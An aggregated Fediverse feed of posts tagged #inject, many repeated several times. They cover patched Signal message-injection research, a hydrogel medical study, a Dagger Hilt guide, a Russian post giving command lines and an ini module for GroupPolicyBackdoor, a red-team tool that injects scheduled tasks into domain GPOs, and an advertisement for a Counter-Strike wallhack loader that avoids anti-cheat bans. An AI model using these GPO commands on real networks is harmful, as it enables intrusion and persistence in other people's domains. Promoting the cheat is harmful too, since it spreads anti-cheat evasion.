home.social

#inject — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #inject, aggregated by home.social.

fetched live
  1. [en] Signal #messenger: "two practical attacks that break the integrity properties of #Signal in its advertised #threat model" - Patched

    Paper #ETHZ

    "... protocol for resolving identities based on usernames and on phone numbers introduced a #vulnerability that allows a malicious server to inject arbitrary messages into one-to-one conversations under specific circumstances"

    "The second #attack is even more severe. It arises from Signal's Sealed Sender (SSS) feature, designed to allow sender identities to be hidden ... a combination of two errors in the #SSS implementation in #Android allows a #malicious server to #inject arbitrary messages into both one-to-one and group conversations."

    eprint.iacr.org/2026/484

    #security #cryptology #encryption #e2e #chat #messaging
    #ResearchHighlights

  2. [en] Signal #messenger: "two practical attacks that break the integrity properties of #Signal in its advertised #threat model" - Patched

    Paper #ETHZ

    "... protocol for resolving identities based on usernames and on phone numbers introduced a #vulnerability that allows a malicious server to inject arbitrary messages into one-to-one conversations under specific circumstances"

    "The second #attack is even more severe. It arises from Signal's Sealed Sender (SSS) feature, designed to allow sender identities to be hidden ... a combination of two errors in the #SSS implementation in #Android allows a #malicious server to #inject arbitrary messages into both one-to-one and group conversations."

    eprint.iacr.org/2026/484

    #security #cryptology #encryption #e2e #chat #messaging
    #ResearchHighlights

  3. [en] Signal #messenger: "two practical attacks that break the integrity properties of #Signal in its advertised #threat model" - Patched

    Paper #ETHZ

    "... protocol for resolving identities based on usernames and on phone numbers introduced a #vulnerability that allows a malicious server to inject arbitrary messages into one-to-one conversations under specific circumstances"

    "The second #attack is even more severe. It arises from Signal's Sealed Sender (SSS) feature, designed to allow sender identities to be hidden ... a combination of two errors in the #SSS implementation in #Android allows a #malicious server to #inject arbitrary messages into both one-to-one and group conversations."

    eprint.iacr.org/2026/484

    #security #cryptology #encryption #e2e #chat #messaging
    #ResearchHighlights

  4. [en] Signal #messenger: "two practical attacks that break the integrity properties of #Signal in its advertised #threat model" - Patched

    Paper #ETHZ

    "... protocol for resolving identities based on usernames and on phone numbers introduced a #vulnerability that allows a malicious server to inject arbitrary messages into one-to-one conversations under specific circumstances"

    "The second #attack is even more severe. It arises from Signal's Sealed Sender (SSS) feature, designed to allow sender identities to be hidden ... a combination of two errors in the #SSS implementation in #Android allows a #malicious server to #inject arbitrary messages into both one-to-one and group conversations."

    eprint.iacr.org/2026/484

    #security #cryptology #encryption #e2e #chat #messaging
    #ResearchHighlights

  5. [en] Signal #messenger: "two practical attacks that break the integrity properties of #Signal in its advertised #threat model" - Patched

    Paper #ETHZ

    "... protocol for resolving identities based on usernames and on phone numbers introduced a #vulnerability that allows a malicious server to inject arbitrary messages into one-to-one conversations under specific circumstances"

    "The second #attack is even more severe. It arises from Signal's Sealed Sender (SSS) feature, designed to allow sender identities to be hidden ... a combination of two errors in the #SSS implementation in #Android allows a #malicious server to #inject arbitrary messages into both one-to-one and group conversations."

    eprint.iacr.org/2026/484

    #security #cryptology #encryption #e2e #chat #messaging
    #ResearchHighlights

  6. What if a #doctor could #inject an electricity-conducting liquid into the body, let it temporarily solidify to record #nerve signals or jump-start healing, and then return it to liquid form for easy removal?
    #MaterialScience #Hydrogel #sflorg
    sflorg.com/2025/12/ms12052501.

  7. What if a #doctor could #inject an electricity-conducting liquid into the body, let it temporarily solidify to record #nerve signals or jump-start healing, and then return it to liquid form for easy removal?
    #MaterialScience #Hydrogel #sflorg
    sflorg.com/2025/12/ms12052501.

  8. What if a #doctor could #inject an electricity-conducting liquid into the body, let it temporarily solidify to record #nerve signals or jump-start healing, and then return it to liquid form for easy removal?
    #MaterialScience #Hydrogel #sflorg
    sflorg.com/2025/12/ms12052501.

  9. What if a #doctor could #inject an electricity-conducting liquid into the body, let it temporarily solidify to record #nerve signals or jump-start healing, and then return it to liquid form for easy removal?
    #MaterialScience #Hydrogel #sflorg
    sflorg.com/2025/12/ms12052501.

  10. What if a #doctor could #inject an electricity-conducting liquid into the body, let it temporarily solidify to record #nerve signals or jump-start healing, and then return it to liquid form for easy removal?
    #MaterialScience #Hydrogel #sflorg
    sflorg.com/2025/12/ms12052501.

  11. GroupPolicyBackdoor

    #redteam #python #windows #gpo

    Инструмент постэксплуатации для различных манипуляций с GPO. Написан на Python.
    Впервые представлен на [DEFCON_33] (synacktiv.com/sites/default/fi)

    Примеры:

    #backup

    ```sh
    python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
    ```

    #inject

    ```sh
    python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
    ```

    Пример ini:

    ```ini
    [MODULECONFIG]
    name = Scheduled Tasks
    type = computer

    [MODULEOPTIONS]
    task_type = immediate
    program = cmd.exe
    arguments = /c "whoami > C:\Temp\poc.txt"

    [MODULEFILTERS]
    filters =
    [{
    "operator": "AND",
    "type": "Computer Name",
    "value": "ad01-srv1.corp.com"
    }]
    ```

  12. GroupPolicyBackdoor

    #redteam #python #windows #gpo

    Инструмент постэксплуатации для различных манипуляций с GPO. Написан на Python.
    Впервые представлен на [DEFCON_33] (synacktiv.com/sites/default/fi)

    Примеры:

    #backup

    ```sh
    python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
    ```

    #inject

    ```sh
    python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
    ```

    Пример ini:

    ```ini
    [MODULECONFIG]
    name = Scheduled Tasks
    type = computer

    [MODULEOPTIONS]
    task_type = immediate
    program = cmd.exe
    arguments = /c "whoami > C:\Temp\poc.txt"

    [MODULEFILTERS]
    filters =
    [{
    "operator": "AND",
    "type": "Computer Name",
    "value": "ad01-srv1.corp.com"
    }]
    ```

  13. GroupPolicyBackdoor

    #redteam #python #windows #gpo

    Инструмент постэксплуатации для различных манипуляций с GPO. Написан на Python.
    Впервые представлен на [DEFCON_33] (synacktiv.com/sites/default/fi)

    Примеры:

    #backup

    ```sh
    python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
    ```

    #inject

    ```sh
    python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
    ```

    Пример ini:

    ```ini
    [MODULECONFIG]
    name = Scheduled Tasks
    type = computer

    [MODULEOPTIONS]
    task_type = immediate
    program = cmd.exe
    arguments = /c "whoami > C:\Temp\poc.txt"

    [MODULEFILTERS]
    filters =
    [{
    "operator": "AND",
    "type": "Computer Name",
    "value": "ad01-srv1.corp.com"
    }]
    ```

  14. Dagger Hilt (Для начинающих)

    Я являюсь разработчиком мобильных приложений с опытом уже более 3х лет! Я всегда разрабатываю мобильные приложения один - это требует моя работа. Но сегодня я хочу поделиться с Вами тем, что такое Dagger Hilt! Следите за мной в телеграм Dagger Hilt - это необходимый каждому инструмент, который упрощает в разы разработку мобильных приложений. Служит для внедрения зависимостей. В первую очередь он необходим тем, у кого в проекте есть множество классов, которые требуют реализации. Хотите чтоб за вас это сделал кто-то другой? Dagger Hilt к вашим услугам.

    habr.com/ru/articles/848690/

    #di #android #adnroid_studio #hilt #dagger #inject #гайды #гайд_для_разработчиков #гайдлайн #kotlin

  15. Dagger Hilt (Для начинающих)

    Я являюсь разработчиком мобильных приложений с опытом уже более 3х лет! Я всегда разрабатываю мобильные приложения один - это требует моя работа. Но сегодня я хочу поделиться с Вами тем, что такое Dagger Hilt! Следите за мной в телеграм Dagger Hilt - это необходимый каждому инструмент, который упрощает в разы разработку мобильных приложений. Служит для внедрения зависимостей. В первую очередь он необходим тем, у кого в проекте есть множество классов, которые требуют реализации. Хотите чтоб за вас это сделал кто-то другой? Dagger Hilt к вашим услугам.

    habr.com/ru/articles/848690/

    #di #android #adnroid_studio #hilt #dagger #inject #гайды #гайд_для_разработчиков #гайдлайн #kotlin

  16. Dagger Hilt (Для начинающих)

    Я являюсь разработчиком мобильных приложений с опытом уже более 3х лет! Я всегда разрабатываю мобильные приложения один - это требует моя работа. Но сегодня я хочу поделиться с Вами тем, что такое Dagger Hilt! Следите за мной в телеграм Dagger Hilt - это необходимый каждому инструмент, который упрощает в разы разработку мобильных приложений. Служит для внедрения зависимостей. В первую очередь он необходим тем, у кого в проекте есть множество классов, которые требуют реализации. Хотите чтоб за вас это сделал кто-то другой? Dagger Hilt к вашим услугам.

    habr.com/ru/articles/848690/

    #di #android #adnroid_studio #hilt #dagger #inject #гайды #гайд_для_разработчиков #гайдлайн #kotlin

  17. Osiris for 2 is a which can't be banned by because it doesn't access Counterstrike's game features

    provides a safe way to the latest version of the Osirirs into Counterstrike

    The cheat provides ways to see enemies through walls and visualizes footsteps and more.

  18. Osiris for #Counterstrike 2 is a #Wallhack which can't be banned by #VAC because it doesn't access Counterstrike's game features

    #Exloader provides a safe way to #inject the latest version of the Osirirs #cheat into Counterstrike

    The cheat provides ways to see enemies through walls and visualizes footsteps and more.

    #ExLoader #Osiris #Counterstrike #CS2 #CS #Cheat #Cheats #Mod #Mods #Extension #Extensions